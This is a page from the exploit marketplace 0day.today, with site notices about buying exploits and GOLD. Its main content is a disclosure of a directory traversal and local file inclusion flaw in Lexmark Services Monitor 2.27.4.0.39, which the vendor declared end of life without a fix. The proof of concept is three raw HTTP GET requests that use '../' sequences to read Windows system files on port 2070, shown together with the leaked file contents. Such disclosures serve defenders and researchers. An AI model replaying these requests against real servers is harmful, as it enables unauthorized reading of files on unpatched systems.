0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal Vulnerability
# Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal # Exploit Author: Kevin Randall # Vendor Homepage: https://www.lexmark.com/en_us.html # Software Link: https://www.lexmark.com/en_us.html # Version: 2.27.4.0.39 (Latest Version) # Tested on: Windows Server 2012 # CVE : N/A Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability. Timeline: Discovered on: 9/24/2019 Vendor Notified: 9/24/2019 Vendor Confirmed Receipt of Vulnerability: 9/24/2019 Follow up with Vendor: 9/25/2019 Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019 Vendor Confirmed Vulnerability is Valid: 9/26/2019 Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019 Vendor Confirmed Signoff to Disclose: 9/27/2019 Final Email Sent: 9/27/2019 Public Disclosure: 11/15/2019 PoC: GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: 10.200.15.70:2070 User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 HTTP/1.0 200 OK Server: rXpress Content-Length: 848536 . . . .[.P.e.r.f.l.i.b.]. . .B.a.s.e. .I.n.d.e.x.=.1.8.4.7. . .L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6. . .L.a.s.t. .H.e.l.p.=.3.3.3.4.7. . . . .[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.]. . .F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8. . .F.i.r.s.t. .H.e.l.p.=.5.0.2.9. . .L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0. . .L.a.s.t. .H.e.l.p.=.5.0.4.1. . . . .[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.]. . .F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6. GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: 10.200.15.70:2070 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3 HTTP/1.0 200 OK Server: rXpress Content-Length: 38710 ..[.S.t.r.i.n.g.s.]. . .L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.". . .L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).". . .L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.". . .L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.". . .L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.". . .L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.". . .L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.". . .L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).". . .L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.". . .L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).". . .L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.". GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: 10.200.15.70:2070 User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de) HTTP/1.0 200 OK Server: rXpress Content-Length: 17463 # Copyright (c) 1993-2004 Microsoft Corp. # # This file contains port numbers for well-known services defined by IANA # # Format: # # <service name> <port number>/<protocol> [aliases...] [#<comment>] # echo 7/tcp echo 7/udp discard 9/tcp sink null discard 9/udp sink null systat 11/tcp users #Active users systat 11/udp users #Active users daytime 13/tcp daytime 13/udp qotd 17/tcp quote #Quote of the day qotd 17/udp quote #Quote of the day chargen 19/tcp ttytst source #Character generator chargen 19/udp ttytst source #Character generator ftp-data 20/tcp #FTP, data ftp 21/tcp #FTP. control ssh 22/tcp #SSH Remote Login Protocol telnet 23/tcp smtp 25/tcp mail #Simple Mail Transfer Protocol time 37/tcp timserver # 0day.today [2024-10-05] #